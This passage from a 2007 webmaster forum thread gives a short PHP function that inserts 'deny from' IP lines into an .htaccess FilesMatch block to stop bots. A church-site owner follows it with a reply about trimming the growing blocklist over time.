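An alternative sketch that avoids the byte arithmetic altogether: read the file, splice the deny line in just before the closing tag, and write it back. It assumes </FilesMatch> appears exactly once in the file (the function name is new, not from the script above):

```php
<?php
// Insert "deny from $ip" immediately before the closing </FilesMatch> tag
// by rewriting the whole file. Refuses to act unless the tag occurs once.
function block_bot_inside($ip, $file) {
    $contents = file_get_contents($file);
    if ($contents === false) {
        return false; // unreadable file or bad path
    }
    $contents = str_replace("</FilesMatch>",
                            "deny from " . $ip . "\n</FilesMatch>",
                            $contents, $count);
    if ($count !== 1) {
        return false; // zero or multiple closing tags: refuse to guess
    }
    return file_put_contents($file, $contents) !== false;
}
```

It is slower than the fseek version for big files, but it cannot corrupt the file by miscounting bytes.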

revrob

9:23 pm on Oct 1, 2007 (gmt 0)

10+ Year Member



Thanks. I'll digest that slowly!
I understand about the long IP list, and I am turning entries into ranges when they come from countries I am not really worried about in terms of site traffic - it's primarily a local site for my neighbourhood: a church site with a Bulgarian link.

I also wondered about letting the IP list grow chronologically from the bottom, keeping any ranges at the bottom, and then taking off the top half every now and again - say once a week or a fortnight depending on traffic. If it's a regular bot it will ban itself next time it visits; if it's very irregular, keeping the IP is a waste; and if it has moved on, the IP might as well be unblocked anyway.

Thanks again for the input.